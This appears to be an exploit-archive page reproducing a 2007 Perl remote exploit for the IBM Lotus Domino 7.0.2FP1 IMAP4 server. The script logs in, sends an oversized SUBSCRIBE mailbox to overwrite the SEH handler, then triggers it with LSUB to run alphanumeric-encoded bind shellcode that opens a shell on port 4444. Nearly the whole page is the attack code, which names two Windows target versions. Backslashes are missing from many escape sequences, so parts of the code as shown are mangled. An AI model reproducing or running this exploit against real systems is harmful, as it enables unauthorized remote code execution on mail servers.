[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit
# Published : 2007-10-27
# Author : FistFuXXer
# Previous Title : IBM Tivoli Storage Manager 5.3 Express CAD Service BoF Exploit
# Next Title : eIQnetworks ESA SEARCHREPORT Remote Overflow Exploit (meta)
#!perl
#
# "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit
#
# Author: Manuel Santamarina Suarez
# e-Mail: FistFuXXer@gmx.de
#
use IO::Socket;
use File::Basename;
#
# destination TCP port
#
$port = 143;
#
# SE handler
#
# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
# You must use a POP/POP/RET sequence that doesn't modify the ESP register or
# the shellcode decoder will fail.
#
$seh = reverse( "x60x21x53x4E" ); # POP EDI/POP EBP/RET
# nnotes.6021534e
# universal on Lotus Domino 7.0.2FP1
#
# Shellcode
# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
#
# 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444)
# 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP)
#
$sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI".
"JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS".
"7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV".
"bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3".
"OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo".
"ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo".
"btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp".
"ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc".
"hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M".
"HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70".
"YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs".
"RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA";
#
# JUMP to 'ESP adjustment' and shellcode
#
$jmp = "x74x20". # JE SHORT
"x75x20"; # JNZ SHORT
#
#
# Don't edit anything after this line
#
#
$sc_limit = 2300;
sub usage {
print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]n".
"Example: ". basename( $0 ) . " 1 192.168.1.19 "Bill Gates/ServerName" "P4ssw0rd"n".
"n".
"Targets:n".
"[1] Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4n".
"[2] Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2n";
exit;
}
# Net::IP::ip_is_ipv4
sub ip_is_ipv4 {
my $ip = shift;
unless ($ip =~ m/^[d.]+$/) {
return 0;
}
if ($ip =~ m/^./) {
return 0;
}
if ($ip =~ m/.$/) {
return 0;
}
if ($ip =~ m/^(d+)$/ and $1 < 256) {
return 1
}
my $n = ($ip =~ tr/././);
unless ($n >= 0 and $n < 4) {
return 0;
}
if ($ip =~ m/../) {
return 0;
}
foreach (split /./, $ip) {
unless ($_ >= 0 and $_ < 256) {
return 0;
}
}
return 1;
}
print "--------------------------------------------------------n".
' "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit'."n".
"--------------------------------------------------------nn";
if( ($#ARGV+1) != 4 ) {
&usage;
}
$user = $ARGV[2];
$pass = $ARGV[3];
# Windows 2000 SP4
if( $ARGV[0] == 1 ) {
$popad = "x41" x 3 . # INC ECX
"x61" x 51; # POPAD
}
# Windows 2003 SP2
elsif( $ARGV[0] == 2 ) {
$popad = "x41" x 2 . # INC ECX
"x61" x 52; # POPAD
}
else {
&usage;
}
if( ip_is_ipv4( $ARGV[1] ) ) {
$ip = $ARGV[1];
}
else
{
&usage;
}
if( length( $sc ) > $sc_limit ) {
print "[-] Error: Shellcode's size exceeds $sc_limit bytes!n";
exit;
}
print "[+] Connecting to $ip:$port...n";
$sock = IO::Socket::INET->new (
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print "[-] Error: Couldn't establish a connection to $ip:$port!n" and exit;
print "[+] Connected.n";
$mailbox = "x44" x 280 . $jmp . $seh . "x44" x 26 . $popad . $sc . "x44" x 3000;
$sock->recv( $recv, 1024 );
$sock->send( "a001 LOGIN "$user" "$pass"rn" );
$sock->recv( $recv, 1024 );
if( $recv ne "a001 OK LOGIN completedrn" ) {
print "[-] Error: Invalid username or password!n";
exit;
}
print "[+] Successfully logged in.n".
"[+] Trying to overwrite and control the SE handler...n";
$sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}rn" );
$sock->recv( $recv, 1024 );
$sock->send( "$mailboxrn" );
$sock->recv( $recv, 1024 );
$sock->send( "a003 LSUB arg1 arg2rn" );
sleep( 3 );
close( $sock );
print "[+] Done. Now check for a bind shell on $ip:4444!n";
# www.Syue.com [2007-10-27]